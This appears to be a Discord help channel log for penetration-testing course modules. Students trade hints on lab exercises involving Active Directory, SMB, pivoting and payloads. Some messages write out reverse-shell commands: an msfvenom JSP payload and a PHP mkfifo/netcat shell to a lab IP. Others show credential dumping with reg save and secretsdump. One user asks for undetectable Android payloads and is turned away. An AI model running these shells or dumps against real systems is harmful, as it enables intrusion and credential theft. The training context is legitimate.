#modules

1 messages · Page 110 of 1

tall saffron
#

anyway

supple patio
#

did you check the question in forum and here?

tall saffron
#

yeah

#

i found the solution, it is easy, it is just the enumeration i try to optimize

fathom pendant
#

Most subdirs if the top level dir is writable are gonna be writable

tall saffron
#

nope the top dirs are READ

#

just one from the 12 is wrtie

supple patio
fathom pendant
#

Ah

tall saffron
#

and we are back to my question 😉

fathom pendant
#

Also I think you can use smbmap with -c to do a command

#

If command fail >> no write

tall saffron
#

yeah there is some ways to do it since we did but i was asking if there was a tool who do it like smbmap with -r or -R

#

seems we need to go around the "problem"

#

it isnt a problem at first xD

#

i did with smbclient and -c like you said, and tried to write my file on a subdir

#

but that was weird there isnt an option for that in smbmap or smbclient

#

or i missed it

#

anyway thanks all for helping

fathom pendant
#

Sir

#

I meant smbmap -c

#

Lol

tall saffron
#

and i meant i already solved it and i meant i search a tool that does it without scripting it because with -c you must script in bash to make it work

#

Lol

fathom pendant
#
Command Execution:
  Options for executing commands on the specified host

  -x COMMAND            Execute a command ex. 'ipconfig /all'
  --mode CMDMODE        Set the execution method, wmi or psexec, default wmi
tall saffron
#

i give up lol

#

thanks for helping

wooden dust
#

how is that running responder smb relaying gves different hashes for just network-joined computer and domain-joined computer?

proud pine
wooden dust
#

so it is worth to run responder on every compromised machine in AD, or just difference is big between machine in domain, and out of domain?

proud pine
#

A non-domain machine isn't going to have the same inter-network communication that would trip responder for domain accounts.

#

Really, you should just use responder always in any windows situation lol

wooden dust
#

cool, thanks

proud pine
#

or inveigh, if you prefer

pine dagger
#

Has anyone done Working with IDS/IPS, specifically Snort Rule Development? I can't seem to get the correct syntax for the answer.

autumn pilot
#

don't forget the ; at the end

pine dagger
#

hrmm

#

Does it need the square brackets

autumn pilot
#

nope

pine dagger
#

Is it the full keyword?

thorn hawk
#

Hello to all. I am a little stuck on the Blind XSS activity regarding the PHP listener I am using to listen back to the connection. The first version of this script was to gather credentials but now I need to gather info from multiple inputs fields such us URL image for avatar. username password e.t.c. While I have to change the location to listen to to the new page of the exercise do I have to add additional parameters for isset() and fputs to gather $_GET[' e.g. URL Image parameter name '] to get these values also?

pine dagger
#

Ah! Got it!

#

Thanks @autumn pilot!

fresh pine
#

Anyone know why I can't send images to this discord?

fresh pine
#

something is definetly wrong because i tried with the next module (windows) and the passwords i get are not the answer

proud pine
fresh pine
#

i'm definetly not getting it 🤣 😅

#

i tried with three different anwser boxes and they dont accept them

thorn hawk
vital adder
#

try with either /tls-seclevel:0 or /timeout:80000 or both

fresh pine
#

@vital adder LLMNR/NBT-NS Poisoning - from Linux from Active driectory enumeration

#

Someone deleted my msg with all the details 😅

vital adder
#

most likely because it's contain spoiler

vital adder
fresh pine
#

I understand but when i input the answer they dont work, I can send images in private if needed

vital adder
faint rampart
thorn hawk
vital adder
faint rampart
vital adder
vital adder
#

walkthrough and write isn't allow for that module

thorn hawk
fresh jay
#

@vital adder ive been having some trouble w a metasploit module, do you mind seeing if im on the right track if i send you the scans and the exploit im using?

vital adder
#

but will if you need some help feel free to shoot me a dm but i'm kinda full right now so you may have to wait a bit 🤣

fresh jay
#

haha thats ok, i appreciate it

#

ill try make it as quick as pos

vital adder
#

sure and same as the others feel free to shoot me a dm if you need help

vital adder
quick cloud
#

I keep getting the following error when trying to use chisel on the pivot host in the module "Pivoting, Tunneling, AND Port Forwarding" section "SOCKS5 Tunneling with Chisel" I used a different version of chisel as stated to do in the section when you receive an error . ubuntu@WEB01:~/chisel-1.7.3$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

vital adder
#

if you are using the arm version then just use the amd version

fresh jay
cosmic raptor
#

Hey everyone, can someone help me with the Modul footprinting - Lab Hard. I’ve managed to get the private key for the user, changed permissions for the ssh key and tryed to log in but it won’t establish a connection .. I’ve tried manythings (switching to root user etc.) doesn’t seem to work , does anyone know what to do?

rustic sage
#

Hello im in module AD Enumeration & Attacks - Skills Assessment Part II in question 11 (Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.), please could somebody help me ?

vital adder
rustic sage
#

Im trying to log in DC01 but credentials doesnt work!!

vital adder
#

but i have help enough people to kinda guess what you are having issue with and hint go back to question 9

vital adder
#

also it's an AD attack not a PrivEsc so why is logging in your first and (maybe) only choice?

vital adder
rustic sage
#

yes

#

i have this issue

#

see it and i delete it because are credentials

vital adder
#

yea that's intended

#

you don't need to login into the DC for this attack

rustic sage
#

mmmm

vital adder
rustic sage
#

i try one think

#

why this doesnt work?

hushed rivet
#

you first have to load it in memory

#

the module

proud pine
#

use .\powerview.ps1

hushed rivet
#

or -s i think

rustic sage
#

i load it

#

im trying to solve this f**cking module but i cant

#

i use this Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

vital adder
#

shoot me a dm with key that you have and if that's wrong i'll send you the one that work for me

vital adder
acoustic owl
#

Did you get the badge now?
It should be possible to get the badge now.

wild dragon
#

not yet, lol

#

@acoustic owl

acoustic owl
#

You were just too fast lol

#

Support can probably help you.

proud pine
#

I am the 0.00%

acoustic owl
wild dragon
rustic sage
#

Hey guys me and my friend gonna make it automattic bot in krunker.io that claim free kr on specific map so if anyone wanna join DM me also we gonna split the kr we make

high reef
#

hello everyone
the live engagment is kicking my butt
in the shells & payload section
don't chat in here much so i can't even uplaod pics
i used this paload to get a reverse shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.11 LPORT=8080 -f war -o revshell.war
but when i deploy it and active my listener nc -lvnp 8080 i get nothing

tranquil axle
#

Do you also click the link after deploying?

rustic sage
#

hello everyone i have a little question what is the diference between wmiexec and psexec and where i have to use they and what ports use?

high reef
vital adder
tender lake
#

I'm a little bit stuck on Password Attacks -Hard assessment. I've got as far as getting the vhd and running it through john and gotten a password, but when I try to mount it (following this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 mentioned previously in this chat), then when I try to open the 'Device' and enter the password it says "Password Incorrect".
Any Idea where I went wrong?

vital adder
#

also pls ask better question some thing like what's the issue, what did you try and what didn't work

rustic sage
vital adder
vital adder
#

if you have some issue flowinging that let me know

quiet geode
#

Hi im stuck at Introduction to bash scripting and im kinda confused what i should try next could someone help me?

woven copper
#

hi there, i dm you my decoded shellcodes

vital adder
high reef
#

revshell upload

vital adder
#

what target are you on and did you try to run the shell?

high reef
#

i went to webpage

high reef
vital adder
#

<@&861185840277487616>

vital adder
#

use 172.16.1.5 instead

high reef
#

will do, how would i konw to use that ip ?

vital adder
#

it's the ip of the given box 🤣

high reef
#

not true

vital adder
#

i mean the internal ip of the foodhold machine

high reef
#

indeed

high reef
vital adder
high reef
#

lol i will need more help in this section

tender lake
high reef
#

my next issue is

#

i can't downlaod the exploit for

#

its in the /etc/hosts file

analog pewter
#

can anybody help how to mount vhd file in linux

trail leaf
vital adder
torn blade
#

im doing the vullnerability assessment module. With openvas what the vulnerabilitys are called is not appeaering

high reef
torn blade
#

i get a long as string like 1.3.6.1.4.1.25623.1.0.900600, not what the vuln is called

zinc marsh
#

buffer-overflow modules are now tier 0?

torn blade
#

which makes it so I cant anser the questions of what vuln its describing

tranquil axle
#

Yes, I had issues mounting the vhd too but that link worked for me

high reef
tender lake
#

Thanks for all the assistance with Password Attacks. Just finished the module

torn blade
#

NVM to my issue, I litearlly changed nothing and it fixed itself randomly

high reef
obsidian crag
#

By listenning the same ip and port that you set for the payload

high reef
#

could you give me an example of the command ?

obsidian crag
#

Bro..better you refer vedios

#

On youtube

#

For msf..there is clear solution

vital adder
obsidian crag
#

I have a question friends...

#

If i pay for an annual vip+ of $200plus

#

Then i can able to get access for pro lab or not ?

trail leaf
#

Pro labs are a separate subscription

zinc marsh
vital adder
zinc marsh
#

academy just covers the modules and with silver sub I think u have 1 attempt for the exam

zinc marsh
#

and in the main platform there is a sub for the machines and other one for the pro labs

fathom pendant
#

Which is still the 2 attempts

civic zenith
#

How do I 'impersonate' a user with 'sqlcmd'?

high reef
#

the exploit should be in metasploit

#

but doesn't show up

vital adder
#

put it in /home/htb-student/.msf4/modules/

fathom pendant
#

Mssqlclient and sqlcmd are relatively the same thing

zinc marsh
#

1 question

#

BOF modules weren't tier 0 before right?

#

I was blind and I just saw I can buy them for 10 cubes

civic zenith
#

@fathom pendant Right ok thx I'll reread some things. Couldn't use mssqlclient because it was lagging to much on the pwnbox, now doing sqlcmd from rdp

fathom pendant
#

So it should be good

acoustic owl
high reef
#

waiting for it to load and hopefully payload is available now

civic zenith
#

Just completed the final 'hard' lab of the Attacking Common Services skills assessment. If anyone needs help on that module or any before it go ahead and ask me and I'll try to give you a hint.

high reef
#

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 171.16.1.5 8443 >/tmp/f"); ?> i uploaded this command and i'm listening on port 8443 and got no connection any idea why ?

civic zenith
#

Try accessing the url of the .php file you uploaded @high reef

high reef
#

got this error

civic zenith
#

not .aspx, you wrote your shell in php originally right? Should be .php

#

unless php is not running on that server

high reef
civic zenith
#

Woops youll have to upload an aspx shell @high reef My mistake I should have just told you that. Normally you don't see php AND aspx running on the same server.

digital pewter
#

The source of the issue is the expired DomainControllerAuthentication and KerberosAuthentication certificates on the domain controller. They expired on March 30, 2023. Another fun exercise is rooting the DC, updating the certs, then proceeding with the PetitPotam exploit. I've posted the issue in #858470491676737536 but it will require someone go update the image.

keen compass
high reef
#

do you have a reverse shell i can use nc with ?

high reef
desert cove
#

Hello i have a question about a Anatomy of a Shell the question is "Which two shell languages did we experiment with in this section? (Format: shellname&shellname)" so my answer is ||powershell&bash|| but i still get an incorrect answer is it because im typing it in the wrong format.

gaunt surge
desert cove
#

Lol it worked 😄 Thanks

trail leaf
mild cypress
#

~~Question regarding Footprinting Lab - Medium ~~

Resolved!

thorn urchin
mild cypress
thorn urchin
#

happens

mild cypress
#

Ended up using Remmina but curious if anyone would suggest any other RDP tools?

frozen mesa
#

INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.
I did the next things: PowerShell -> Get-Process | Where-Object { $_.Name -like "vm" }

Results: vmtoolsd (which is wrong) and vm3dservice (which is also wrong)

Anyone a hint what i did do wrong?

zinc marsh
#

evil-winrm is for winrm

#

for rdp u can use xfreerdp or whatever tool u want to use

gaunt surge
mild cypress
mild cypress
ancient glade
#

Hey all, I have a question about the Attacking Common Services - Easy section.|| I got a set of creds and was able to find the upload portal on the site, as well as it's path on the host, but am not sure how to leverage this. I know that uploading a shell is the way to go, but I can't find where the file goes. || Any help is appreciated

trail leaf
rustic arrow
acoustic owl
frozen mesa
#

INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Task 10 (last one) What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

#

All the info i got from the log files are incorrect. Should i connect to another machine (DC) first?

acoustic owl
static shadow
#

can anyone help me with this Ques :

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

Ive tried nslookup and dig tools
cant find the FQDN on the output...am I missing something?

acoustic owl
tender lake
#

Just wondering what I am possibly doing wrong. I trying to do the quiz for Attcking Common Services - FTP but I just cant see the FTP port. I'm using sudo nmap -p- -sV -sC <IP> but the only open services that I get back is ssh DNS and SMB

#

when I scan specifically for FTP like its stated in the section -p 21 I can see 21/tcp closed ftp

violet berry
#

Hey guys I'm a newbie in the academy and don't understand if I where to finish a certain amount of modules am I going to have a chance to be recruited in the HTB organization?

frozen mesa
dawn parrot
#

@nimble fractal i am using "sudo responder -I tun0" for the resonder, anything wrong here?

acoustic owl
trail leaf
pine dagger
#

Anyone done Introduction to C#? I'm having a problem getting VS Code to import the library from the Assessment.

acoustic owl
pine dagger
acoustic owl
dawn parrot
#

module : attacking sql databases
i have logged in with the given creds, trying to do hash stealing but getting this errors. any help is appreciated

acoustic owl
#

I'll take care of it tomorrow.

pine dagger
acoustic owl
pine dagger
#

hahaha

trail leaf
acoustic owl
dawn parrot
#

@trail leaf yep

pine dagger
acoustic owl
nimble fractal
dawn parrot
#

@nimble fractal

thorn urchin
#

your error tells you the problem

#

xp_subtree doesnt exist

acoustic owl
thorn urchin
#

and you dont have perms for xp_subdirs

pine dagger
dawn parrot
#

@thorn urchin found it thx for the help

thorn urchin
#

np

tender lake
pine dagger
acoustic owl
dire birch
#

hello i need help with Attacking Common Services - easy

#

i heard its a cursed module

slate vector
pine dagger
slate vector
#

Ye it is for a sever

pine dagger
slate vector
#

It gives full access doesn’t it

#

Oh

#

I did not read

#

My b

pine dagger
#

yep! /bonk

slate vector
#

😂

#

What

#

Was

#

That

acoustic owl
pine dagger
#

Spammer got auto banned I think

slate vector
#

Oh

#

Anyone know how to hide links

#

Cuz I use this

#

Give me a sec

dire birch
acoustic owl
pine dagger
dire birch
#

tried smtp-user-enum, also hydra for password spraying on ftp and rdp

pulsar needle
#

How am I supposed to get the hashes from a NTDS.dit file I have? I tried to cat it and got the binaries xd

pine dagger
#

Are you using the provided user.list file?

tender lake
dire birch
pine dagger
dire birch
#

yeah

pine dagger
#

What commands are you trying? (obfuscate them)

keen compass
pulsar needle
dire birch
#

i am, otherwise i wouldnt even see it

dire birch
keen compass
pine dagger
pine dagger
keen compass
# keen compass you must provide path to every files (NTDS SYSTEM, SAM)

if you read French : https://rebrec.github.io/rebsecnotes-public/_Techniques/Windows/Dump de credentials/Dump de la SAM/#sam
else basically you first need to gather thoses 3 files by running the following on the compromised host :

reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

then you download the 3 "save" files on your attack box and then run

secretsdump.py local -sam sam.save -security security.save -system system.save LOCAL
pine dagger
#

Technically, they only need the SYSTEM, as they've got the NTDS.dit

keen compass
#

umm nevermind, just bumped on secretsdump and didn't read properly

pine dagger
#

😄

keen compass
#

🙂

dire birch
#

ok for some reason i found an user

pulsar needle
#

It works

#

thanks

thorn urchin
#

Because the connection in question wasnt being broadcasted across the network

#

ONLY being sent to that one box

#

also a ton of spoilers, should delete your message now

#

Nice, definitely above and beyond the scope the lab intends for ya, but imo thats where some of the best learning is done

#

even if in this case the motivation was to fix the lab

silent sleet
#

If we have a student HTB academy plan, the silver plan really only gives us the free voucher, yeah? pretty much the only thing you'd get from going to student to silver or am I missing something

keen compass
#

thanks will try with certify this is weird that the enrollment agent is not able to get a new cert and certify can lol. I am wondering how certify get the certs it it using the web endpoint instead of RPC calls ?

zinc marsh
#

damn the practice is really working 😄

#

I got this box solo in around 3 hours prayge

tender lake
zinc marsh
keen compass
zinc marsh
zinc marsh
#

u are using windows as attacking box?

keen compass
# zinc marsh from kali

the goal is to install new certificates on the domain controller, even if this may be feasable with certipy, it would be more complex I guess

zinc marsh
#

I thought u wanted to get the certificate

keen compass
#

🙂

zinc marsh
#

not create and new one

digital pewter
zinc marsh
#

which module is it?

#

I would like to learn about that

digital pewter
zinc marsh
#

I don't remember doing anything about certificates in that module

tender viper
#

@fathom pendant I'm stuck on the Footprinting Lab - Easy......... Can someone help assist me in this module? Once I log into the ftp sever with the creds provided, I can't seem to progress form there.

digital pewter
thorn urchin
#

Id love an ADCS module though

zinc marsh
#

oh okay

autumn pilot
#

I kindly advise to not spoil the exercises, additionally to not push students into rabbitholes

trail leaf
#

Not spoilers when the whole exercise says "do what we did in the section"

thorn urchin
#

I dont see how its spoiling an exercise. Its an optional section

autumn pilot
#

I'm talking in general

thorn urchin
#

I guess ¯_(ツ)_/¯

pine dagger
#

Wheee!

crude otter
#

guyys

thorn urchin
autumn pilot
#

I've seen students falling into rabbitholes just because they have read x, y and z, without considering

#

From different users

pine dagger
#

2 more questions to go and I'll have finished every (current) module! 😄

thorn urchin
#

Rabbit holes have the best knowledge gains

pine dagger
#

That's possible, but only if they can dig themselves out of the rabbit hole

thorn urchin
#

@acoustic owl be fuming

crude otter
#

i have a problem , how could shutdown redeemer machine in hack the box, i cannot connect whit the machine but i can stop thath machine

autumn pilot
#

Not quite, especially when you don't know what you are doing

crude otter
#

please

pine dagger
thorn urchin
#

they too have been aiming to clear every academy module

crude otter
#

sorry

pine dagger
rustic sage
crude otter
#

i have no acces

#

:c

thorn urchin
pine dagger
# rustic sage How was it ?

Relatively easy up until the Skill Assessment, where it suddenly was a bit more complicated. But nothing too difficult. Hardest part was getting VS Codium to co-operate and get the wordlist out of the library.

thorn urchin
#

and youll gain access

rustic sage
#

they have labs ? For this

pine dagger
pine dagger
# rustic sage they have labs ? For this

Some basic questions for some of the modules, with a couple of labs. Final lab is importing a dll, and then using it to enumerate against a HTTP server to grab a flag.

soft timber
#

Hello

#

What is the difference between HTB academy and try hack me?

pine dagger
#

Similar things

#

I've only done a little THM, but it felt a bit more walkthroughy

digital pewter
# pine dagger Wheee!

Nice! I've been waiting for this. Have been having some trouble locating quality zero to hero Offensive C#.

pine dagger
#

I've finally done it! Taken a year, but I've done it!!

#

Now to do some prolabs and boxes, lol

high reef
#

i only need to answer this one question to be done with shells and payloads

#

i'm stuck here, i go to website and find the clue to download the 50064.rb file

#

i upload it to msfconsole but i get this error message

#

i set the rhosts=172.16.1.12 set lhost=172.16.1.5 set username admin set password admin123!@#

#

i saw a clue on the forum about vhost its not needed to be set, but what would it be set to ?

zinc marsh
#

keep the grind

#

I am still at 48/83

ancient glade
#

Hey all, I'm having a issue in the Password attacks “Passwd, Shadow & Opasswd” module.|| I got the passwd and shadow file, unshadowed it, but now I'm running the command "hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked" and getting no results. Both the passord.list file and mut_password.list files exhausted the list, and rockyou.txt is going to take three hours. Is there anythiung else I can do, or do I just need to bite the bullet.|| Advice here or DMs would be appreciated.

green girder
#

Hi so about the Learning Process module, I've revisited it and was going through some of my notes and saw that "The Learning Pyramid" has some controversy behind it, this being more specifically directed at sections: Learning Efficiency and Learning Type.

||The controvesy being that NTL Institute the initial Research org that published "the learning pyramid" is currently unable to prove any of it's work due to quote "While we believe it to be accurate, we no longer have nor can we find the original research that supports the numbers." <- This was taken from The paper published by Kare Letrud "A Rebuttal of NTL Institute's Learning Pyramid".||

#

Anyone find any similar info in their research? Also I've tried searching for the original papers on "The Learning Pyramid" and have yet to stumble on anything.

thorn urchin
#

Idk, I loosely follow the ultra learning principles. Never learned this Learning Pyramid

#

I wouldnt worry about it too much

#

either you have the passion and spark of curiosity that drives you to learning in this field or you dont

green girder
#

I can side with that, learning to discern info was part of the module's advice 😛

maiden spindle
#

any hints? as to what I might be doing wrong? the last person who got stuck here didn't get an answer in the channel

#

got it

wheat garden
wheat garden
pine dagger
#

Yep! And that’s the plan!

wheat garden
#

thats a helluva achievement though congrats every sing module!

thorn urchin
# wheat garden

wrapped in spoiler and harmless as it is. Id delete before a mod a reads it

gloomy bramble
#

You figure this one out yet? I am stuck here also. I got all the subdomains, running dig to check records, and not finding anything. I see something with flags in records, but that is not it.

tender viper
#

Can anyone help with the Footprinting Lab -Easy?

silent sleet
#

you guys all doing the attacking enterprise networks module at the very end blind? doable blind ?

thorn urchin
#

Mostly blind

#

one little part im not sure how I would have done blind without simply knowing the trick of it beforehand

#

added to my notes ofc

proud pine
#

That one part was totally not fair lol

silent sleet
#

without giving anything away

thorn urchin
#

youll find out

silent sleet
#

hehe alright indeed i will

lyric bolt
#

Im still stuck on AD enumeration skills assessment question8 i must be overthinking this gahhh

cunning prairie
lyric bolt
#

#2

silent sleet
#

that was the one that got me for few minutes as well but then I read the hint

lyric bolt
#

Im sitting as system on MSQL01 and tried all the things i can think of to get myself admin on MS01

silent sleet
#

ohh it was the next one that had me stumped not that one

#

just read the hint on that one, go back to the basics

lyric bolt
#

something talked about in this module basics or previous modules?

silent sleet
#

the hint on the next one helps too, this one "Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?"

#

embrace the suffering, thats where you learn the most 😄 - go back to the basics of the module, the hint is a give away, good luck

#

I would also say, just start from scratch, do a full start to finish attack. I did both the AD exercises blind, only read the questions towards the end of #2 for the hint. So I had already mapped out the entire domain, users, groups, privs etc. If you're just answering the questions, maybe you haven't done full enumeration yet so do that

lyric bolt
#

ahhh okay

rustic sage
#

@lyric bolt🍞

bleak nexus
#

ive spent all day looking at different reasources, determining which module I should begin with

#

its... exciting to learn about all these different things

#

hopefully I can stay consistent in my learning

#

I dont know exactly what I want to achieve with htb

#

but ill do it regardless

fathom pendant
bleak nexus
#

Im on the your interests screen on the account creation part

#

once I hit it, i realized I dont exactly know uhh

#

what intrests me

fathom pendant
bleak nexus
#

alright

#

I also know a tiny bit of python if that adds any value

#

trying to get better in that regard

high reef
#

Todays lab was the Tom cat server.. I couldn’t figure it out. But eventually got it! I go out to party and Tom cat looking right at me

fathom pendant
obsidian crag
#

Can anyone tell me the suggestion for undetectable payload and for autoinstallation

#

?

obsidian crag
#

It's a personal qs

obsidian crag
#

For my project

fathom pendant
obsidian crag
#

All the times my playload got detect by firewall androi.

#

Uselesss🙄🙄🙄

fathom pendant
#

Then that's just a skill issue. But it is wholly unrelated to this channel

obsidian crag
#

Good bye

fathom pendant
#

Good

obsidian crag
fathom pendant
#

🙄

obsidian crag
fathom pendant
#

Go fuck off now, if you don't know how to read rules

obsidian crag
#

U too kek

fathom pendant
#

pika_sip I at least know what the rules are and what the purpose of this channel is

obsidian crag
#

No u don't know

#

Hackthebox is totally related to learning

#

Not only modules

vital adder
#

@obsidian crag don't want to destroy the fun but keep spamming unrelated stuff to this channel like that you will get the 👢from one of the mod

obsidian crag
#

Okk🙄

fathom pendant
modern falcon
#

COMMAND INJECTIONS - Advanced Command Obfuscation: How do I bypass the blacklist filter of the -n 1 part in the command "tail -n 1"?

modern falcon
#

Doesn't work

#

I can run tail but when I try to add the -n 1 part it cannot run

fathom pendant
#

reread the section maybe ¯_(ツ)_/¯

#

I haven't done this. So I'm spitballing

edgy dust
#

hey

#

I'm new to this whole thing and am trying to sign up for the HTB thing, and I don't understand what exactly everything means in the "your interests" section means

#

could someone give me the rundown?

modern falcon
fathom pendant
#

It's overall, not actually important

#

just user data stuff ¯_(ツ)_/¯

edgy dust
#

Yes, however, when I say I'm new to this whole thing, I mean I'm brand spanking new to this entire field, I don't understand what the words mean

fathom pendant
#

Then you don't need to really select anything or just use google

edgy dust
#

wtf is a DevSecOps or a Cryptography

#

It forces you to choose 3+ items

fathom pendant
#

Development Security Operations

#

Just honestly Google them or select arbitrarily

#

It really doesn't matter

edgy dust
#

I'm just going to choose all the ones that say Penetration testing because I'm childish and that sounds funny

fathom pendant
#

¯_(ツ)_/¯

#

Like I said it doesn't matter

edgy dust
#

ok, cool

acoustic owl
acoustic owl
thorn urchin
#

I was just joshing around

rustic sage
#

what is function of -z

coarse escarp
#

So Im having some problems with the introduction modules.

#

yet the site works just fine

gaunt surge
# rustic sage what is function of -z

it checks if the passed argument is empty. ex:

#!/bin/bash

if [[ -z $1 ]]; then
  echo "No argument provided"
else
  echo "argument: $1"
fi

example;

if i run this

./program``` 
returns 'no argument provided'

```bash
./program hello```
returns ' argument: hello'
coarse escarp
#

can anyone help me out here on to what's going on?

#

also, the emulators are slow to

gaunt surge
#

@coarse escarp is this for the questions section Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'?

#

@coarse escarp You need to start the target and then connect to the given ip to access the website.

coarse escarp
#

im looking for locations using post

#

oooh

rustic sage
coarse escarp
#

i need to spawn it in first

gaunt surge
coarse escarp
gaunt surge
#

if you would pass 2 arguments in single [ <x> ] it would return too many arguments + the normal result for example, in double [[ <x> ]] it would just return the normal result

coarse escarp
#

what the fuuuu

#

wrong pic

#

lol

#

wtf happened here??

#

I just reset

gaunt surge
coarse escarp
gaunt surge
#

same for the ip

#

remove the < >

coarse escarp
#

did that now I gotta add a new port number lol

coarse escarp
#

no such file or directory...

gaunt surge
#

@coarse escarp can you show the full command you have now?

gaunt surge
#

you still have < and > at the ip address, remove those

coarse escarp
#

but then why did the instructions say <IP_address>:<Portnumber>

vital adder
#

that's just a placeholder

coarse escarp
#

I'm semi new but come from a coding bacground

#

in a object bassed code that is used as a housing syntax

#

so I'm a little confused but will remember not to use those

#

oh wait..

#

I didn't add paramaters

gaunt surge
# coarse escarp
  1. you have a space before the port number it seems like, there should be no space after the :
  2. not -x but -X
coarse escarp
#

got it

weak kindle
#

😄

rustic sage
#

what is mean f this?

coarse escarp
#

wait... that's the same pic

#

hold on

#

so it's saying I need a valid cookie but I copy and pasted the most recent one

#

with the correct port number

coarse escarp
#

an if else command is an example of a condition

#

If the amount is above 50 dollars deny acces Else allow transaction

#

and a variable can be anything you set value to

#

it's a container of value

#

so for java a variable looks like {Bank amount = $~}

#

a for loop is a repeated action on till a condition is met

#

and it doesn't exactly need to be a repeated action either

#

it's a way of making the code flow

#

it's a different kind of jump condition

#

for each task is complete go back and repeat until a clause is met

#

a bit rusty so I had to double check some of my work

#

great...

#

because of my internet I lost my box

wise vault
#

What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)

#

please someone answer

#

i have no paid subs.

vital adder
# coarse escarp because of my internet I lost my box

if you mean the pwnbox then
Please note, free users are only able to spawn one Pwnbox instance per day. The Pwnbox instance has a lifetime of 120 minutes. Internet access is limited to our own targets, and GitHub. This limit can be lifted by making a purchase on Academy.

coarse escarp
wise vault
#

What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)

wild dragon
pine dagger
#

Im sure they will fix it on Monday 🙂

coarse escarp
#

so in the regular htb I'm having trouble with a build bash script

#

I'm litterally a few commands away from completeing this box

#

but it's not finding a supported release

narrow solar
#

good day friends, how to solve this?

acoustic owl
narrow solar
#

no its anew one

#

its at AD Enumeration & Attacks - Skills Assessment Part II

acoustic owl
acoustic owl
narrow solar
#

oh i get it 😅 thanks a lot 😊

sleek urchin
#

Doing HTTPs/TLS Attacks:Skills Assessment and have been stuck for couple of days, from what i understand it's oracle padding attack and error massage is "Decryption failed" not " Padding failed", therefor the decryption of htb-user cookie succeed, but getting admin user cookie seems to be missing an encryption and i tried adding base64 + hex {vise versa} encoding to admin cookie but no results

#

any help is well appreciated!!

acoustic owl
#

Have you decoded the token?

coarse escarp
#

would you mind seeing what's wrong?

acoustic owl
# coarse escarp would you mind seeing what's wrong?

I can help you with most of the modules in the Academy, but I don't have notes from Starting Point.
That's why I told you to ask your question in the right channel. There will be people there who can help you.

sleek urchin
#

after i got what is supposedly the admin cookie and tied to redeem it /token but I get " Decryption Error. Invalid Token! "

acoustic owl
sleek urchin
sleek urchin
cedar void
#

I am having trouble with this question('+ 5 What is the password history size of the domain? (How many passwords remembered.') from the section of this module(https://academy.hackthebox.com/module/22/section/290) and I think I have to look for the domainDNS with the search filter of the ldapsearch-ad command:

"python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -search-filter "domainDNS"

The command below didn't return the results I wanted. What else could I add to this command ?

zinc marsh
#

how many threads u guys use with ffuf

#

to enumerate subdomains

subtle flicker
#

Hey i'm on pivoting module in the SocksOverRDP section. I've uploaded the zip into the windows machine and extracted the files, but once i try to "load" the .dll file this error occurs

#

The file is detected as a virus and is deleted just after the command

gusty zinc
#

Module: File Upload Attacks
Section: Final Assessement

I'm stuck, cant make any progress on this - can someone give me nudge? Open for a DM?

acoustic owl
subtle flicker
acoustic owl
rustic sage
#

Module : Network Enumeration with NMAP
Section : Saving the result
Using VPN
Question : is this a networking issue or do I have to change my nmap parameters to do the requested scan ?
Thx

fathom pendant
#

And because you're doing -p- it's checking all ports

fading meadow
#

Module: Network Enumeration with NMAP
Section: Firewall and IDS/IPS Evasion - Easy Lab
Question: i cant seem to find OS type everything i try gives me back "No exact OS matches for host"
Only thing i found was this but the answer is not Linux
Also i fond some write up that says i shoud use this but its not working (nmap --script smb-os-discovery 10.129.2.8)

#

How do i send pictures discord is not leting me

fathom pendant
#

You can reasonably assume the os based off that (it's the distro)

fathom pendant
fading meadow
#

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel (i found this)

#

ty

fathom pendant
#

Or perform it specifically targeting the web server

rustic sage
proud pine
rustic sage
fathom pendant
#

You're doing a syn scan meaning it's going to keep trying until max retries are met

#

Iirc you can hard set --max-retries

fathom pendant
misty mural
#

I'm working through the Live Engagement of the Shells & Payloads modules and am on Task 3.

|| I'm attempting to use EternalBlue to exploit the machine, but it's failing. The server allows aspx uploads and I am able to access PowerShell with antak. I'm in a mental block where I'm not sure what I require to move forward. ||

fathom pendant
torn steppe
#

@fathom pendant that was my inital fault 😄

misty mural
#

Love that you asked this. The results from ifconfig give me several results and I'm conditioned to use tun0 (not present).

torn steppe
#

ifconfig for win!!

#

remember that you are in a foothold !!

misty mural
#

I have prefixes docker, ens, and lo. My intuition says docker.

torn steppe
#

try other 😄

#

but you are in the good path

#

@misty mural Have you achieve the reverse?

misty mural
#

No, the process fails after the exploit is executed on the target.

acoustic owl
#

Wrong Server

misty mural
torn steppe
#

task 3 you mean the host3?

misty mural
torn steppe
#

what service are you trying to exploit?

misty mural
torn steppe
#

I supose you are using metasploit ?

#

waht module?

misty mural
#

windows/smb/ms17_010_eternalblue

rustic sage
#

@proud pine @fathom pendant thx for your help. I answered the module final question by doing a -Pn scan... but... I'm still wondering why -p- option takes so long time. I tested it on my own VB and same thing.... very long ....

torn steppe
#

sometimes some modules are better than others,depending on the host...

#

@rustic sage using -p- and not using any othe flag as -min-rate or -T4 , and if you are using normal three hand shake tcp imagine for 65535 ports...

torn steppe
#

XDDDD

misty mural
#

